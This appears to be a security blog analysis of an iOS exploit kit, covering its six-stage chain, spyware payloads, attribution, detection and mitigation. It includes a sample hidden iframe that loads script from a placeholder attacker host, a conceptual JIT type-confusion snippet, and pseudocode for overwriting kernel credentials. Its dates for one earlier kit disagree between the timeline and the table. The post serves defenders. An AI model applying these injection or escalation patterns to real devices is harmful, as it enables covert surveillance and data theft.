DarkSword The Six-Stage iOS Exploit Kit Used by States, Spies, and Surveillance Vendors
Executive Summary
DarkSword is the most sophisticated publicly documented iOS exploit kit to date — a fully weaponized, JavaScript-based full-chain exploit framework that compromises any iPhone running iOS 18.4 through 18.7 via a single Safari visit. No click, no download, no interaction. Just load a page, and the device is owned.
Discovered and disclosed by Google Threat Intelligence Group (GTIG), iVerify, Lookout, and Zimperium in March 2026, DarkSword had already been silently active since at least November 2025. During that window:
- A Russian state-sponsored espionage group (UNC6353) used it against Ukrainian targets
- A Turkish commercial spyware vendor (PARS Defense) deployed it against targets in Turkey and Malaysia
- An unknown threat cluster (UNC6748) used it to target Saudi Arabian users
DarkSword chains six distinct zero-day and n-day vulnerabilities across every layer of iOS security — WebKit JIT, hardware PAC protection, graphics sandbox, system daemons, and the XNU kernel — to achieve root-level code execution. It then deploys one of three spyware payloads (GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER), each tailored to different threat actor objectives, before self-deleting to minimize forensic traces.
DarkSword is the evolution of Coruna — another iOS exploit kit used by the same Russian group against older iOS versions. Together, they represent a maturing commercial iOS exploit ecosystem where nation-state-grade tools are being bought, sold, licensed, and proliferated at unprecedented speed.
Timeline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Early 2025 → Coruna exploit kit disclosed (targets iOS 13.0–17.2.1)
Used by UNC6353 against Ukraine
November 2025 → DarkSword first observed in the wild
Targets iOS 18.4–18.7 (Coruna's successor)
UNC6353 begins using DarkSword against Ukraine
Nov 2025–Mar 2026 → Active exploitation:
UNC6748 targets Saudi Arabia (fake Snapchat site)
PARS Defense customers target Turkey & Malaysia
March 17–19, 2026 → Google GTIG, iVerify, Lookout, Zimperium publicly disclose
Apple emergency patches released
March 20, 2026 → CISA adds CVE-2025-43510 to KEV catalog
220+ million iPhones estimated to be at risk
DarkSword vs. Coruna: Evolution of a Platform
| Feature | Coruna | DarkSword |
|---|---|---|
| Target iOS versions | 13.0 – 17.2.1 | 18.4 – 18.7 |
| Number of exploits | 23 (5 full chains) | 6 (1 adaptive chain) |
| Language | Mixed | Entirely JavaScript |
| Delivery | Watering hole (iframes) | Watering hole (iframes) |
| Approach | Persistent implant | Hit-and-run |
| LLM assistance | Limited | Suspected (code patterns) |
| Primary user | UNC6353 (Russia) | UNC6353, UNC6748, PARS Defense |
| Payloads | Unknown | GHOSTBLADE, GHOSTKNIFE, GHOSTSABER |
| Financial motivation | No | Yes (crypto wallet targeting) |
| Disclosure | Early 2026 | March 2026 |
DarkSword is not just an update to Coruna — it is a platform redesign optimized for speed, evasion, and multi-customer deployment.
The Six Vulnerabilities: A Layered Attack
DarkSword chains six CVEs in sequence. Each targets a different iOS security boundary:
| Stage | CVE | Component | Technique | Patched In |
|---|---|---|---|---|
| 1a | CVE-2025-31277 | JavaScriptCore DFG JIT | Memory corruption → RCE (iOS < 18.6) | iOS 18.6 |
| 1b | CVE-2025-43529 | JavaScriptCore DFG JIT (GC bug) | Memory corruption → RCE (iOS 18.6–18.7) | iOS 18.7.3, 26.2 |
| 2 | CVE-2026-20700 | dyld (Dynamic Link Editor) | PAC / TPRO bypass → arbitrary code exec | iOS 26.3 |
| 3 | CVE-2025-14174 | ANGLE (graphics layer) | OOB write + PAC bypass → GPU sandbox escape | iOS 18.7.3, 26.2 |
| 4 | (XPC injection) | mediaplaybackd | Process injection via XPC | N/A (architectural) |
| 5 | CVE-2025-43510 | XNU kernel / AppleM2ScalerCSCDriver | COW race condition → kernel memory R/W | iOS 18.7.2, 26.1 |
| 6 | CVE-2025-43520 | XNU kernel | Memory corruption → full kernel privesc | iOS 18.7.2, 26.1 |
Notable: CVE-2026-20700 (the PAC bypass) was patched only in iOS 26.3 — a later patch than the others — meaning devices that applied iOS 18.7.2 and 26.1 patches were still partially vulnerable to certain DarkSword variants until the iOS 26.3 release.
Technical Deep Dive: How DarkSword Works
Delivery: Watering Hole + Malicious iframe
The attack begins when a target visits a compromised website. DarkSword’s delivery infrastructure injects a hidden iframe into the legitimate page. The iframe loads the JavaScript exploit payload — invisibly, silently, requiring no clicks.
1
2
3
4
5
<!-- Injected into compromised legitimate website -->
<iframe src="https://[attacker-infra]/ds/init.js"
width="0" height="0"
style="display:none">
</iframe>
DarkSword uses the same fingerprinting and selective targeting approach as sophisticated exploit kits:
- Check iOS version → select correct Stage 1 CVE variant
- Check device model (iPhone vs iPad vs older device)
- Verify not already compromised (cookie check)
- Only proceed if target matches profile
Stage 1: Remote Code Execution — JavaScriptCore JIT
The JIT (Just-In-Time) compiler in JavaScriptCore transforms JavaScript into native ARM machine code for performance. Both Stage 1 CVEs exploit the DFG (Data Flow Graph) layer of the JIT:
CVE-2025-31277 — A memory corruption flaw in DFG JIT triggered by specific patterns of JavaScript operations that cause the JIT to make incorrect assumptions about object types, leading to type confusion and memory corruption.
CVE-2025-43529 — A garbage collection race condition in the DFG JIT layer. When the garbage collector runs while JIT-compiled code is executing certain operations, a timing window allows access to already-freed memory (use-after-free pattern).
Both result in the same outcome: arbitrary memory read/write within the WebContent renderer process.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// CONCEPTUAL — illustrative of the class of vulnerability
// JIT type confusion pattern (not actual exploit code)
function triggerBug() {
let arr = [1.1, 2.2, 3.3]; // Double array
let obj = {};
// Repeated calls cause JIT to specialize for double arrays
for (let i = 0; i < 10000; i++) getElement(arr);
// Now replace with object — JIT's type assumption is wrong
arr[0] = obj; // Type confusion: JIT treats object as double
getElement(arr); // Memory corruption triggered
}
// This provides arbitrary R/W primitive in WebContent memory
Stage 2: PAC and TPRO Bypass — dyld
Pointer Authentication Codes (PAC) is an ARM hardware feature that cryptographically signs code pointers (return addresses, function pointers). Without bypassing PAC, an attacker with arbitrary memory R/W cannot redirect code execution — any forged pointer is rejected by hardware.
CVE-2026-20700 exploits a flaw in dyld (Apple’s dynamic linker) during the initialization of shared libraries. A specific edge case in how dyld validates PAC-signed pointers during library loading allows the attacker to:
- Cause dyld to accept a forged pointer as legitimate
- Use this to defeat TPRO (Trusted Path Read-Only) — which prevents modification of code pages
Result: Forged code pointers are now accepted by hardware → arbitrary code execution becomes possible.
Stage 3: Sandbox Escape — WebContent to GPU Process
Safari isolates web content in a heavily sandboxed WebContent process. To reach higher-privilege code, DarkSword must escape.
CVE-2025-14174 is an out-of-bounds write in ANGLE (Almost Native Graphics Layer Engine) — the cross-platform graphics abstraction layer used by WebKit for GPU-accelerated rendering operations.
1
2
3
4
5
6
7
8
9
WebContent process has legitimate access to GPU via ANGLE
↓
Exploit crafts specific WebGL operations that trigger OOB write in ANGLE
↓
Combined with PAC bypass from Stage 2
↓
Memory corruption in GPU-facing code → code execution in GPU process
↓
Escaped from WebContent sandbox → now in GPU process
Stage 4: Pivoting via XPC — GPU to mediaplaybackd
From the GPU process, DarkSword injects into mediaplaybackd — a higher-privileged system daemon handling media playback. This is achieved by crafting malicious XPC messages targeting the daemon’s exposed IPC interface.
mediaplaybackd has broader system access than the GPU process, including access to kernel driver interfaces — setting up Stage 5.
Stage 5: Kernel Memory R/W — CVE-2025-43510
From within mediaplaybackd, DarkSword accesses AppleM2ScalerCSCDriver — a kernel driver related to Apple Silicon’s hardware scaler.
The bug is an improper locking / copy-on-write (COW) race condition:
1
2
3
4
5
6
7
8
9
10
11
12
Normal COW behavior:
1. Process A maps shared memory region (read-only)
2. Process A attempts write → kernel creates private copy (COW)
3. Process A writes to its private copy
Vulnerable behavior (CVE-2025-43510):
1. mediaplaybackd maps shared region via driver XPC interface
2. Race condition: between COW creation and lock acquisition,
another thread modifies the original shared region
3. Both the original AND the private copy now reflect the write
4. mediaplaybackd effectively wrote to kernel-mapped memory
→ Arbitrary kernel memory read/write primitive
Stage 6: Full Kernel Compromise — CVE-2025-43520
With arbitrary kernel memory R/W from Stage 5, DarkSword exploits CVE-2025-43520 — a kernel memory corruption vulnerability — to corrupt the kernel’s process credential structures:
1
2
3
4
5
6
7
8
9
10
11
12
Target: struct proc_ro (read-only process structure in kernel)
Contains: effective UID, GID, entitlements, sandbox profile
Action:
1. Read process's kernel task port address
2. Use arbitrary R/W to locate proc_ro structure in kernel memory
3. Overwrite euid/egid to 0 (root)
4. Overwrite sandbox token → remove sandbox restrictions
5. Add platform application entitlement
Result: Process now runs as root with no sandbox
→ Full access to entire device filesystem and hardware
The GHOST Malware Family
After achieving kernel compromise, DarkSword deploys one of three payloads based on the threat actor’s objective:
GHOSTBLADE — The Data Thief
Deployed by: UNC6353 (Russia), targeting Ukraine
Type: JavaScript-based infostealer / dataminer
Approach: Hit-and-run — collect everything fast, then disappear
GHOSTBLADE is optimized for speed and breadth. Within seconds of deployment:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Communications:
├── iMessage database (full history)
├── SMS messages
├── WhatsApp messages and media
├── Telegram messages
└── Email, call logs, contacts
Financial:
├── Cryptocurrency exchange apps: Coinbase, Binance, Kraken,
│ Kucoin, OKX, MEXC
└── Wallet apps: Ledger, Trezor, MetaMask, Exodus,
Uniswap, Phantom, Gnosis Safe
Personal:
├── Photos, videos (with metadata)
├── Keychain-related files (saved passwords)
├── Safari history, cookies, passwords
├── Apple Health data
├── Calendar, notes
└── iCloud Drive files
Device Intelligence:
├── Wi-Fi networks and passwords
├── Installed app list
├── Device/account identifiers
└── Location history
GHOSTBLADE then deletes crash logs and other potential forensic indicators before exiting. No persistence — one fast strike.
GHOSTKNIFE — The Persistent Backdoor
Deployed by: UNC6748 (Saudi Arabia targeting)
Type: JavaScript backdoor with C2 communication
Approach: Ongoing surveillance capability
GHOSTKNIFE is a more capable persistent backdoor:
- Communicates via custom encrypted binary protocol over HTTP (harder to detect than standard HTTPS)
- Can download and execute additional payloads from C2
- Real-time data exfiltration: messages, browser data, location, audio recordings
- Screenshot capability — capture screen on demand
- Persistent — designed to survive reboots and remain on device
GHOSTSABER — The Remote Control Agent
Deployed by: PARS Defense customers (Turkey & Malaysia targeting)
Type: Full JavaScript Remote Access Trojan (RAT)
Approach: General-purpose remote device control
GHOSTSABER provides the most comprehensive control:
- Remote JavaScript execution — run arbitrary code on device on demand
- File system enumeration and access
- Account and app enumeration
- Data exfiltration on command
- General backdoor functionality for sustained access
| Feature | GHOSTBLADE | GHOSTKNIFE | GHOSTSABER |
|---|---|---|---|
| Purpose | One-time data theft | Ongoing surveillance | Remote control |
| Persistence | No | Yes | Yes |
| C2 protocol | HTTPS | Custom encrypted binary | Unknown |
| Audio recording | No | Yes | Unknown |
| Screenshots | No | Yes | Yes |
| Remote code exec | No | Limited | Yes |
| Crypto targeting | Yes | No | No |
Attribution: A Multi-Customer Exploit Ecosystem
UNC6353 — Russian State-Sponsored Espionage
Classification: Assessed as Russian state-sponsored; suspected FSB or GRU affiliation
History: Previously used Coruna against Ukraine (iOS 13–17); transitioned to DarkSword for newer iOS
Targets: Ukrainian government, military, journalism, and civil society
Method: Watering hole attacks on compromised Ukrainian government websites and news portals
Payload: GHOSTBLADE (data theft emphasis — messages, credentials, device intel)
Dual motive: Espionage + financial (crypto wallet targeting suggests financial theft alongside intelligence collection)
Notable: Cyberscoop reported possible connections between DarkSword tools and previously U.S. government-developed techniques, suggesting either independent rediscovery or exploit market acquisition
UNC6748 — Unknown Threat Cluster
Classification: Unknown; potentially state-linked or criminal
Target: Saudi Arabia
Method: Deceptive Snapchat-themed website — social engineering targeting younger users
Payload: GHOSTKNIFE (persistent backdoor — longer-term surveillance)
Objective: Likely intelligence collection on Saudi nationals
PARS Defense — Turkish Commercial Spyware Vendor
Classification: Commercial Surveillance Vendor (CSV)
Customers: Government and law enforcement agencies
Targets: Turkey, Malaysia
Payload: GHOSTSABER (full remote control — maximum capability for law enforcement use cases)
Significance: Represents the commercialization of DarkSword — making it available as a service to governments that may lack the capability to develop their own exploit chains
The Commercial Exploit Ecosystem
DarkSword’s proliferation across three distinct, unrelated threat actors reveals the existence of a mature commercial iOS exploit marketplace:
1
2
3
4
5
6
7
8
9
10
11
12
13
Zero-day research
↓
Vulnerability broker / marketplace
├──► Nation-state intelligence agencies (develop in-house)
├──► Commercial surveillance vendors (PARS Defense, NSO Group, Intellexa)
│ └──► License to government customers
└──► Criminal groups (acquire at market rates)
Each buyer receives:
- The compiled exploit kit (DarkSword)
- Payload customized for their use case (GHOST*)
- Infrastructure (C2 servers)
- Updates when patches break the chain
Market dynamics observed:
- Coruna “second-hand market”: after UNC6353 used Coruna, it proliferated to a Chinese financially motivated actor (UNC6691) and at least one commercial vendor — suggesting exploit kits are resold or leaked after initial use
- DarkSword’s code shows patterns consistent with LLM-assisted development — complex JavaScript written with consistency and speed suggesting AI assistance in codebase expansion
- Three major iOS exploit kits disclosed in 2026 (Coruna, DarkSword, and others) within weeks of each other — suggesting either coordinated disclosure by researchers or accelerated discovery timelines
Detection and Forensics
DarkSword’s hit-and-run design makes detection extremely difficult. However, some approaches exist:
iVerify Threat Detection
iVerify’s mobile threat detection platform specifically flags:
- Anomalous iOS kernel behavior patterns
- Unusual process activity from WebContent/GPU/mediaplaybackd
- Memory access pattern anomalies consistent with kernel exploitation
Crash Log Analysis
GHOSTBLADE deletes crash logs — but the deletion itself is an artifact:
1
2
3
4
5
6
7
Settings → Privacy & Security → Analytics & Improvements → Analytics Data
Look for:
- Crash logs for WebContent, GPU, mediaplaybackd
around the time of suspicious Safari activity
- Log files with modification timestamps but no content
(deleted logs leave empty file handles in some cases)
- Unexpected restarts of system daemons
Network Traffic Indicators
1
2
3
4
5
6
Immediately after Safari session:
- Sudden HTTPS upload bursts to unknown servers
- DNS queries to newly registered / unusual domains
- Connections on unusual ports from iOS system daemons
- GHOSTKNIFE's custom binary protocol may appear as:
unusual binary content in HTTP POST body to C2 servers
Lockdown Mode as Prevention
On supported iOS versions, Lockdown Mode directly blocks Stage 1:
1
2
3
4
5
6
7
Settings → Privacy & Security → Lockdown Mode → Turn On
Effect on DarkSword:
✓ Disables JIT compilation in Safari → CVE-2025-31277 & CVE-2025-43529 blocked
✓ Restricts WebGL features → limits ANGLE attack surface
✓ Blocks most JavaScript-based exploitation vectors
✗ Does not protect against physical device compromise
Mitigation
For All iPhone Users
1
2
3
4
5
6
7
8
9
10
11
1. Update immediately:
iOS 18.7.6+ — patches all 6 DarkSword CVEs for iOS 18 branch
iOS 26.3.1+ — patches all 6 DarkSword CVEs for iOS 26 branch
Settings → General → Software Update → Download and Install
2. Enable Automatic Updates:
Settings → General → Software Update → Automatic Updates → ON
3. iOS 15 / 16 users:
Apply Apple's March 11, 2026 backport patches
For High-Risk Individuals
(Journalists, activists, government officials, executives, dissidents)
1
2
3
4
5
6
7
8
9
10
1. Enable Lockdown Mode:
Settings → Privacy & Security → Lockdown Mode → Turn On
2. Deploy iVerify for mobile threat detection
3. Avoid unfamiliar links in iMessage, WhatsApp, Telegram
4. Use Private Browsing mode for general web use
5. Consider a separate "burner" device for high-risk activities
For Enterprises
1
2
3
4
5
6
7
8
9
1. MDM policy: enforce minimum iOS version (18.7.6 or 26.3.1)
Block access to corporate resources from non-compliant devices
2. Deploy Mobile Threat Defense (MTD) solution:
Lookout, Zimperium, iVerify for Enterprise
3. Monitor enterprise DNS for connections to DarkSword C2 patterns
4. User awareness: warn about visiting unknown websites on iPhone
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Drive-by Compromise | T1189 |
| Execution | Exploitation for Client Execution (Browser) | T1203 |
| Privilege Escalation | Exploitation for Privilege Escalation (Kernel) | T1068 |
| Defense Evasion | Indicator Removal: File Deletion (crash logs) | T1070.004 |
| Defense Evasion | Rootkit (Kernel-level access) | T1014 |
| Defense Evasion | Reflective Code Loading (fileless JS) | T1620 |
| Credential Access | Credentials from Password Stores: Keychain | T1555.001 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Collection | Data from Local System | T1005 |
| Collection | Email Collection | T1114 |
| Collection | Screen Capture | T1113 |
| Collection | Audio Capture (GHOSTKNIFE) | T1123 |
| Collection | Location Tracking | T1430 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
| Exfiltration | Automated Exfiltration | T1020 |
Conclusion
DarkSword represents a new baseline for mobile threat capability — a fully JavaScript-based, six-stage iOS exploit chain that achieves root kernel access through a browser visit, deploys customized surveillance payloads, and self-destructs within minutes.
Its proliferation across Russian intelligence, Turkish commercial vendors, and unknown Gulf-region actors within the same time window reveals an uncomfortable truth: nation-state-grade mobile exploitation is no longer exclusive to nations. It is bought, sold, licensed, and iterated upon in a commercial market that operates in the grey zone between intelligence tools and criminal spyware.
Three takeaways for the mobile security community:
- iOS security is strong but not invincible — six simultaneous zero-days were silently exploited for months before disclosure
- The commercial spyware industry is the distribution mechanism — Pegasus, Predator, Coruna, DarkSword all share the same market structure
- The only reliable protection is current patches + Lockdown Mode — architectural iOS defenses delayed but did not prevent exploitation
Update your phone. Enable Lockdown Mode if you’re at risk. And treat every unpatched iPhone as a potential surveillance device.
References
- Google Threat Intelligence — DarkSword iOS Exploit Chain
- Google Threat Intelligence — Coruna iOS Exploit Kit
- Zimperium — DarkSword: Successor to Coruna
- Lookout — DarkSword Threat Intelligence
- iVerify — DarkSword Explained
- The Hacker News — DarkSword Uses 6 iOS Flaws
- Security Week — DarkSword Used by State Hackers and Spyware Vendors
- Bleeping Computer — DarkSword iOS Exploit
- CyberScoop — Russian Hackers Use iPhone Exploit Against Ukraine
- CISA KEV — March 20, 2026
- Tom’s Guide — 220 Million iPhones Under Attack
This post is intended for security researchers, mobile threat analysts, and enterprise security teams. All technical analysis is based on publicly disclosed research.